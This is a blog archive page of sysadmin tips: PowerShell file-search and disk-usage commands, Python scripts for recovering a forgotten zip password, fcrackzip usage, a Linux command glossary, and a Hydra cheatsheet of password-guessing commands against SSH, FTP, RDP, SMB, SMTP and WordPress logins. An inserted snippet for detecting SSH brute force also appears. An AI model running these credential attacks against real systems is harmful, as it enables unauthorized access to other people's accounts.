Eric Verlooij

Month: March 2020

Finding files by search term

Are you looking for a file but can no longer remember what it was called? Then you can write a small script in PowerShell and find it anyway. Say you are looking for a txt or csv file that contains the word aap or konijn. This little script does that for you.
Name the script, for example: zoek.ps1

# Words to look for
$searchWords = 'aap','konijn'

foreach ($sw in $searchWords)
{
    # Walk d:\ recursively, keep only txt and csv files, and grep each one for the word
    Get-ChildItem -Path "d:\" -Recurse -Include "*.txt","*.csv" |
    Select-String -Pattern "$sw" |
    Select-Object Path,LineNumber,@{n='SearchWord';e={$sw}}
}

Because you cannot just start a PowerShell script, you first have to give permission for that. After that you can run the script with ./zoek.ps1

# Allow locally written scripts to run; -Scope CurrentUser limits the change to your own account instead of the whole machine
Set-ExecutionPolicy RemoteSigned -Scope CurrentUser

Finding the largest files

Windows says your hard disk is almost full, but you have no idea how that happened. Then try the command below in PowerShell. It shows the 25 largest files. If you really want to search all files you will have to run PowerShell as administrator.

gci -r | sort -Descending -Property Length | select -First 25 Name, Length

Now you probably also want to know where the files are. To show the path as well, we replace Name with FullName.

gci -r | sort -Descending -Property Length | select -First 25 FullName, Length

The script below is the bomb. It searches your C:\ drive and then shows the files it found in a grid, so you can get to work on them right away.

Get-ChildItem -Path 'C:\' -Recurse -Force -File |
    Select-Object -Property FullName,
        @{Name='SizeGB';Expression={$_.Length / 1GB}},
        @{Name='SizeMB';Expression={$_.Length / 1MB}},
        @{Name='SizeKB';Expression={$_.Length / 1KB}} |
    Sort-Object { $_.SizeKB } -Descending |
    Out-GridView

Unzipping a password-protected zip

What was that password again that you protected that zip with? You just cannot remember it. Then you will have to come up with something else. Below are a few tricks with which you can probably get the password back after all.

Wordlist

First try a wordlist, which you can pass as the second argument to this little Python script.

import sys
import zipfile

from tqdm import tqdm

# Usage: python zoek_zip.py <archive.zip> <wordlist.txt>
zip_path = sys.argv[1]
wordlist_path = sys.argv[2]

zip_file = zipfile.ZipFile(zip_path)

# Count the candidates first so tqdm can show a real progress bar
with open(wordlist_path, "rb") as f:
    n_words = sum(1 for _ in f)
print("Total passwords to test:", n_words)

with open(wordlist_path, "rb") as wordlist:
    for word in tqdm(wordlist, total=n_words, unit="word"):
        try:
            # A wrong password raises (RuntimeError, BadZipFile or zlib.error)
            zip_file.extractall(pwd=word.strip())
        except Exception:
            continue
        else:
            print("[+] Password found:", word.decode().strip())
            sys.exit(0)
print("[!] Password not found, try other wordlist.")

Brute force

If it turns out not to be a password from the wordlist, then it is time for heavier artillery. We are going to try every conceivable password. We build the password from the characters in the variable "Alphabet". We start with passwords of 1 character, then 2 characters, then 3, 4, 5 and so on. The round with 1-character passwords is done in no time, and 2 and 3 still work too, but after that it quickly takes longer. On an average PC you are busy for a few days just to check the passwords of 6 characters.

import sys
import time

# Character set the candidates are built from
Alphabet = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890-_."
# For this exercise the candidates are compared against a typed-in password, not against the zip
Password = input("What is your password?\n")
start = time.time()


def buildpwd(Alphabet, pwd, number, Password):
    # Recursively prepend every character until the candidate is 'number' characters long
    if number > 0:
        for c in Alphabet:
            buildpwd(Alphabet, c + pwd, number - 1, Password)
    else:
        if pwd == Password:
            print("Found your password: it is: ", pwd)
            sys.exit()


for t in range(1, 10):
    print(t, " karakters proberen")
    buildpwd(Alphabet, "", t, Password)
    timetaken = time.time() - start
    print(timetaken, " time sofar\n")

Any speed gain is welcome, and thanks to itertools it can be a lot faster.

It runs a lot faster, only there are 6 special characters that you cannot put in your character set. With itertools, a tuple of passwords is built at lightning speed. It seems about 5 times faster than the script above.

import itertools
import sys
import time

Alphabet = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890-_."
# As in the previous script, the candidates are compared against a typed-in password
Password = input("What is your password?\n")
start = time.time()
counter = 0

for CharLength in range(1, 12):
    # itertools.product lazily yields every CharLength-tuple drawn from Alphabet
    passwords = itertools.product(Alphabet, repeat=CharLength)
    elapsed = max(time.time() - start, 1e-9)  # avoid dividing by zero in the first round
    print("\n\ncurrently working on passwords with ", CharLength, " chars")
    print("We are currently at ", counter / elapsed, "attempts per seconds")
    print("It has been ", elapsed, " seconds!")
    print("We have tried ", counter, " possible passwords!")

    for i in passwords:
        counter += 1
        # The tuple is flattened by stripping the tuple syntax from its repr,
        # which is why those characters can never be part of Alphabet
        i = str(i)
        for c in "[]' ,()":
            i = i.replace(c, "")

        if i == Password:
            timetaken = max(time.time() - start, 1e-9)
            print("Found in ", timetaken, " seconds and ", counter, "attempts")
            print("That is ", counter / timetaken, " attempts per second!")
            print(i)
            input("Press enter when you have finished")
            sys.exit()

Anyway, what a hassle all of that is. It was a nice exercise, but you can also get to work with John the Ripper or with fcrackzip.

fcrackzip -b -c a1:$% -l 1-6 -u myencrypted.zip

Options

  • -b – brute force
  • -c a1:$% – specifies the character sets to use
  • -l 1-6 – specifies the length of passwords to try
  • -u – unzip to weed out wrong passwords

Usage

$ fcrackzip --help

fcrackzip version 1.0, a fast/free zip password cracker
written by Marc Lehmann <pcg@goof.com> You can find more info on
http://www.goof.com/pcg/marc/

USAGE: fcrackzip
          [-b|--brute-force]            use brute force algorithm
          [-D|--dictionary]             use a dictionary
          [-B|--benchmark]              execute a small benchmark
          [-c|--charset characterset]   use characters from charset
          [-h|--help]                   show this message
          [--version]                   show the version of this program
          [-V|--validate]               sanity-check the algortihm
          [-v|--verbose]                be more verbose
          [-p|--init-password string]   use string as initial password/file
          [-l|--length min-max]         check password with length min to max
          [-u|--use-unzip]              use unzip to weed out wrong passwords
          [-m|--method num]             use method number "num" (see below)
          [-2|--modulo r/m]             only calculcate 1/m of the password
          file...                    the zipfiles to crack

methods compiled in (* = default):

 0: cpmask
 1: zip1
*2: zip2, USE_MULT_TAB

Hydra Password Cracking Cheatsheet

Command | Description
hydra -P password-file.txt -v $ip snmp | Brute force against SNMP
hydra -t 1 -l admin -P /usr/share/wordlists/rockyou.txt -vV $ip ftp | FTP, known user and rockyou password list
hydra -v -V -u -L users.txt -P passwords.txt -t 1 -u $ip ssh | SSH using a list of users and passwords
hydra -v -V -u -L users.txt -p "" -t 1 -u $ip ssh | SSH using a known password and a username list
hydra $ip -s 22 ssh -l -P big_wordlist.txt | SSH against a known username on port 22
hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f $ip pop3 -V | POP3 brute force
hydra -P /usr/share/wordlistsnmap.lst $ip smtp -V | SMTP brute force
hydra -L ./webapp.txt -P ./webapp.txt $ip http-get /admin | Attack an HTTP GET 401 login with a dictionary
hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$ip | Attack Windows Remote Desktop with rockyou
hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt $ip smb | Brute force an SMB user with rockyou
hydra -l admin -P ./passwordlist.txt $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location' | Brute force a WordPress admin login

GET request

hydra -l admin -P /root/Desktop/wordlists/test.txt dvwa http-get-form "//index.php:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect."

POST request

hydra -L usernames.txt -P rockyou.txt http-post-form "/loginCheck.php:username=^USER^&password=^PASS^:F=invalid" -f
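Every Hydra run above leaves the same footprint on the target: a burst of failed logins from one source, sometimes followed by a success. As an added example (not from this post), the Python below flags that pattern in OpenSSH auth-log lines; the log lines, the threshold of 5 failures and the 60-second window are constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed OpenSSH auth-log lines (sample input, not taken from the post)
SAMPLE_LOG = """\
Mar 14 10:00:01 srv sshd[1201]: Failed password for invalid user admin from 203.0.113.5 port 51234 ssh2
Mar 14 10:00:02 srv sshd[1202]: Failed password for root from 203.0.113.5 port 51236 ssh2
Mar 14 10:00:02 srv sshd[1203]: Failed password for root from 203.0.113.5 port 51238 ssh2
Mar 14 10:00:03 srv sshd[1204]: Failed password for invalid user test from 203.0.113.5 port 51240 ssh2
Mar 14 10:00:03 srv sshd[1205]: Failed password for root from 203.0.113.5 port 51242 ssh2
Mar 14 10:00:04 srv sshd[1206]: Accepted password for root from 203.0.113.5 port 51244 ssh2
Mar 14 10:05:00 srv sshd[1300]: Failed password for alice from 198.51.100.7 port 40001 ssh2
Mar 14 10:09:00 srv sshd[1301]: Accepted publickey for alice from 198.51.100.7 port 40002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?:password|publickey) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)

def parse(line, year=2020):
    """Return (timestamp, result, user, ip) or None; syslog lines carry no year."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["result"], m["user"], m["ip"]

def find_bruteforce(log_text, threshold=5, window_s=60):
    """Map each IP with >= threshold failures in a window_s sliding window to (failures, distinct users, success after burst)."""
    by_ip = defaultdict(list)
    for ev in filter(None, map(parse, log_text.splitlines())):
        by_ip[ev[3]].append(ev[:3])
    hits = {}
    for ip, evs in by_ip.items():
        evs.sort()
        fails = [(ts, user) for ts, result, user in evs if result == "Failed"]
        lo = 0
        for hi in range(len(fails)):
            while (fails[hi][0] - fails[lo][0]).total_seconds() > window_s:
                lo += 1  # slide the window start forward
            if hi - lo + 1 >= threshold:
                users = {u for _, u in fails[lo:hi + 1]}
                ok_after = any(r == "Accepted" and ts >= fails[hi][0] for ts, r, _ in evs)
                hits[ip] = (hi - lo + 1, len(users), ok_after)
                break
    return hits
```

An Accepted login from the same source right after the burst (the third field) is the case to page on; a burst without one is a candidate for rate limiting or a blocklist.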

A

apt: Search for and install software packages (Debian)

apt-get: Search for and install software packages (Debian)

aptitude: Search for and install software packages (Debian)

aspell: Spell Checker


B

basename: Strip directory and suffix from filenames

bash: GNU Bourne-Again Shell. A shell command language

bc: Arbitrary precision calculator language

bg: Send to background

break: Exit from a loop

builtin: Run a shell builtin

bzip2: Compress or decompress named file(s)

C

cal: Display a calendar

case: Conditionally perform a command

cat: Concatenate and print (display) the content of files

cd: Change Directory

cfdisk: Partition table manipulator for Linux

chgrp: Change group ownership

chmod: Change access permissions

chown: Change file owner and group

chroot: Run a command with a different root directory

cksum: Print CRC checksum and byte counts

clear: Clear terminal screen

cmp: Compare two files

comm: Compare two sorted files line by line

command: Run a command – ignoring shell functions

continue: Resume the next iteration of a loop

cp: Copy one or more files to another location

cron: Daemon to execute scheduled commands

crontab: Schedule a command to run at a later time

csplit: Split a file into context-determined pieces

cut: Divide a file into several parts

D

date: Display or change the date & time

dc: Desk Calculator

dd: Convert and copy a file, write disk headers, boot records

ddrescue: Data recovery tool

declare: Declare variables and give them attributes

df: Display free disk space

diff: Display the differences between two files

diff3: Show differences among three files

dig: DNS lookup

dir: Briefly list directory contents

dircolors: Colour setup for 'ls'

dirname: Convert a full path name to just a path

dirs: Display list of remembered directories

dmesg: Print kernel & driver messages

du: Estimate file space usage

E

echo: Display message on screen

egrep: Search file(s) for lines that match an extended expression

eject: Eject removable media

enable: Enable and disable builtin shell commands

env: Environment variables

ethtool: Ethernet card settings

eval: Evaluate several commands/arguments

exec: Execute a command

exit: Exit the shell

expect: Automate arbitrary applications accessed over a terminal

expand: Convert tabs to spaces

export: Set an environment variable

expr: Evaluate expressions

F

false: Do nothing, unsuccessfully

G

gawk: Find and Replace text within file(s)

getopts: Parse positional parameters

grep: Search file(s) for lines that match a given pattern

groupadd: Add a user security group

groupdel: Delete a group

groupmod: Modify a group

groups: Print group names a user is in

gzip: Compress or decompress named file(s)

H

hash: Remember the full path name of a name argument

head: Output the first part of file(s)

help: Display help for a built-in command

history: Command History

hostname: Print or set system name

I

iconv: Convert the character set of a file

id: Print user and group ids

if: Conditionally perform a command

ifconfig: Configure a network interface

ifdown: Stop a network interface

ifup: Start a network interface up

import: Capture an X server screen and save the image to file

install: Copy files and set attributes

J

jobs: List active jobs

join: Join lines on a common field

K

kill: Stop a process from running

killall: Kill processes by name

L

less: Display output one screen at a time

let: Perform arithmetic on shell variables

ln: Create a symbolic link to a file

local: Create variables

locate: Find files

logname: Print current login name

logout: Exit a login shell

look: Display lines beginning with a given string

lpc: Line printer control program

lpr: Off line print

lprint: Print a file

lprintd: Abort a print job

lprintq: List the print queue

lprm: Remove jobs from the print queue

ls: List information about file(s)

lsof: List open files

M

make: Recompile a group of programs

man: Help manual

mkdir: Create new folder(s)

mkfifo: Make FIFOs (named pipes)

mkisofs: Create an hybrid ISO9660/JOLIET/HFS filesystem

mknod: Make block or character special files

more: Display output one screen at a time

mount: Mount a file system

mtools: Manipulate MS-DOS files

mtr: Network diagnostics (traceroute/ping)

mv: Move or rename files or directories

mmv: Mass Move and rename (files)

N

netstat: Networking information

nice: Set the priority of a command or job

nl: Number lines and write files

nohup: Run a command immune to hangups

notify-send: Send desktop notifications

nslookup: Query Internet name servers interactively

O

open: Open a file in its default application

op: Operator access

P

passwd: Modify a password

paste: Merge lines of files

pathchk: Check file name portability

ping: Test a network connection

pkill: Stop processes from running

popd: Restore the previous value of the current directory

pr: Prepare files for printing

printcap: Printer capability database

printenv: Print environment variables

printf: Format and print data

ps: Process status

pushd: Save and then change the current directory

pwd: Print Working Directory

Q

quota: Display disk usage and limits

quotacheck: Scan a file system for disk usage

quotactl: Set disk quotas

R

rcp: Copy files between two machines

read: Read a line from standard input

readarray: Read from stdin into an array variable

readonly: Mark variables/functions as readonly

reboot: Reboot the system

rename: Rename files

renice: Alter priority of running processes

remsync: Synchronize remote files via email

return: Exit a shell function

rev: Reverse lines of a file

rm: Remove files

rmdir: Remove folder(s)

rsync: Remote file copy (Synchronize file trees)

S

screen: Multiplex terminal, run remote shells via ssh

scp: Secure copy (remote file copy)

sdiff: Merge two files interactively

sed: Stream Editor

select: Accept keyboard input

seq: Print numeric sequences

set: Manipulate shell variables and functions

sftp: Secure File Transfer Program

shift: Shift positional parameters

shopt: Shell Options

shutdown: Shutdown or restart Linux

sleep: Delay for a specified time

slocate: Find files

sort: Sort text files

source: Run commands from a file '.'

split: Split a file into fixed-size pieces

ssh: Secure Shell client (remote login program)

strace: Trace system calls and signals

sum: Print a checksum for a file

suspend: Suspend execution of this shell

symlink: Make a new name for a file

sync: Synchronize data on disk with memory

T

tail: Output the last part of file

tar: Tape ARchiver

tee: Redirect output to multiple files

test: Evaluate a conditional expression

time: Measure Program running time

times: User and system times

touch: Change file timestamps

top: List processes running on the system

traceroute: Trace Route to Host

trap: Run a command when a signal is set (Bourne)

tr: Translate, squeeze, and/or delete characters

true: Do nothing, successfully

tsort: Topological sort

tty: Print filename of terminal on stdin

type: Describe a command

U

ulimit: Limit user resources

umask: Users file creation mask

umount: Unmount a device

unalias: Remove an alias

uname: Print system information

unexpand: Convert spaces to tabs

uniq: Uniquify files

units: Convert units from one scale to another

unset: Remove variable or function names

unshar: Unpack shell archive scripts

until: Execute commands (until error)

uptime: Show uptime

useradd: Create new user account

userdel: Delete a user account

usermod: Modify user account

users: List users currently logged in

V

v: Verbosely list directory contents ('ls -l -b')

vdir: Verbosely list directory contents ('ls -l -b')

vi: Text Editor

vim: Text Editor

vmstat: Report virtual memory statistics

W

wait: Wait for a process to complete

watch: Execute/display a program periodically

wc: Print byte, word, and line counts

whereis: Search the user's $PATH, man pages and source files for a program

which: Search the user's $PATH for a program file

while: Execute commands

who: Print all usernames currently logged in

whoami: Print the current user id and name ('id -un')

wget: Retrieve web pages or files via HTTP, HTTPS or FTP

write: Send a message to another user

X

xargs: Execute utility, passing constructed argument list(s)

xdg-open: Open a file or URL in the user’s preferred application.

Y

yes: Print a string until interrupted

youtube-dl: Download a YouTube video

Z

zcmp: Minimal utility used to compare compressed files

zdiff: Minimal utility used to compare compressed files

zip: Simple, easy-to-use utility to package and compress (archive) files

© 2024 Eric Verlooij
